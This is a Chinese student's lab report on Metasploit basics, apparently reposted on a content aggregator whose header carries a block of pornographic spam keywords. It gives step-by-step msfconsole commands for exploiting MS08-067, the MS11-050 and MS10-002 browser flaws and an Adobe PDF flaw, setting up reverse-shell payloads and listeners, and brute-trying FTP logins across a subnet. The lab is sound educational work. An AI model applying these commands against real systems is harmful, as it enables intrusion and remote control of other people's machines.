日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

20155227《网络对抗》Exp5 MSF基础应用

發布時間:2025/7/14 编程问答 14 豆豆
生活随笔 收集整理的這篇文章主要介紹了 20155227《网络对抗》Exp5 MSF基础应用 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

20155227《網絡對抗》Exp5 MSF基礎應用

基礎問題回答

  • 用自己的話解釋什么是exploit,payload,encode

    • exploit:把實現設置好的東西送到要攻擊的主機里。

    • payload:用來攻擊的代碼、程序等。

    • encode:編碼方式,讓被傳輸的東西變得更不易被發現。

實驗步驟

1.主動攻擊:ms08_067

  • 首先,先用search ms08_067查詢一下針對該漏洞的攻擊模塊:

  • 用use exploit/windows/smb/ms08_067_netapi使用該模塊
  • 輸入命令show payloads會顯示出有效的攻擊載荷

  • 使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷
  • 輸入命令set LHOST "kali Ip" set RHOST "Win xp Ip"
  • 使用命令show options查看payload狀態

  • 輸入命令exploit開始攻擊,攻擊成功

  • 在kali上執行ipconfig/all:

  • 在win xp上執行ipconfig/all:

發現二者結果相同,說明成功攻擊.
還可以進行MS08_067遠程漏洞攻擊實踐:meterpreter:

2.對瀏覽器攻擊:MS11_050漏洞滲透攻擊/MS10-002漏洞攻擊

  • 先利用search ms11_050指令查看可以運用的攻擊模塊
  • 使用use windows/browser/ms11_050_mshtml_cobjectelement模塊:
  • 用info查看該模塊的信息:

  • 用set payload windows/meterpreter/reverse_tcp設置payload,并設置需要設置的參數。

  • 用show options確認需要設置的參數是否已經設置好:

  • 確認參數設置無誤后,用exploit指令開始攻擊,攻擊成功后會有靶機需要訪問的網址:

  • 在靶機IE上輸入該網址出現404not found的錯誤:

因為靶機上的IE版本不符合可攻擊的版本,所以無法攻擊成功。

之后換成了狄惟佳同學提供的IE,在IE中輸入網址,查看內容:

但是很快,IE出現彈窗,警告遇到問題需關閉程序。

之后我又嘗試了win7下的IE8,也是同樣的結果,一輸入網址IE就自動關閉。參考了狄同學的博客,修改了IE的安全設置,結果還是不行。

  • 我又嘗試了成功攻擊的同學使用的方法:MS10-002漏洞攻擊,同樣設置參數后exploit,在靶機IE中輸入網址,此時kali中可以看到有目標主機上線,會話建立。

  • 輸入sessions -i 1,成功獲取靶機的shell,可以對其進行操作:

3.針對客戶端的攻擊:adobe_toolbutton

  • 在kali終端中開啟msfconsole
  • 輸入命令use exploit/windows/fileformat/adobe_cooltype_sing,進入該漏洞模塊的使用
  • 使用命令set payload windows/meterpreter/reverse_tcp設置攻擊有效載荷
  • 設置相關數據:

  • show options:

  • 輸入exploit,生成pdf文件,并可以看到pdf所在文件夾,將pdf復制到靶機里:


  • 使用use exploit/multi/handler新建監聽模塊(和前幾次實驗一樣)

  • 使用命令exploit開始攻擊,在靶機中打開pdf,攻擊成功:

4.成功應用任何一個輔助模塊

4.1 scanner/http/dir_scanner
  • 用show auxiliary查看所有輔助模塊,并選擇其中的一個,我使用的是scanner/http/dir_scanner掃描網站目錄。
  • 查看需要設置的參數,設置完成后確認一下,然后就可以開始exploit了:
  • 可以進行對單一目標主機的掃描,也可以對指定網段的主機進行掃描:

4.2 auxiliary/scanner/ftp/ftp_login
  • 選擇ftp_login模塊,掃描網段192.168.115.1-10中能使用固定用戶名和密碼root/123456登陸主機:

  • 查看輸出結果,可以看出在這10個IP中沒有FTP Server使用root/123456賬號登陸。通常在公司或學校內網里,很多人習慣使用簡單的賬號,沒有足夠的安全意識,當攻擊者成功入侵內網后,這些工作站將非常危險。

離實戰還缺些什么技術或步驟?

實戰的時候要結合靶機的具體環境考慮。

實驗體會

Metasploit提供了豐富的掃描功能、攻擊腳本及二次開發的平臺,使網絡安全漏洞檢測變得相對容易。在這次實驗過程中我走的彎路較少。具體來說就是先尋找可攻擊的漏洞、再根據漏洞名和所屬目錄猜測漏洞攻擊的方面、再查看漏洞的詳細信息、再設置一系列參數、最后實施攻擊并查看攻擊結果。

轉載于:https://www.cnblogs.com/guyanlin/p/8876851.html

總結

以上是生活随笔為你收集整理的20155227《网络对抗》Exp5 MSF基础应用的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。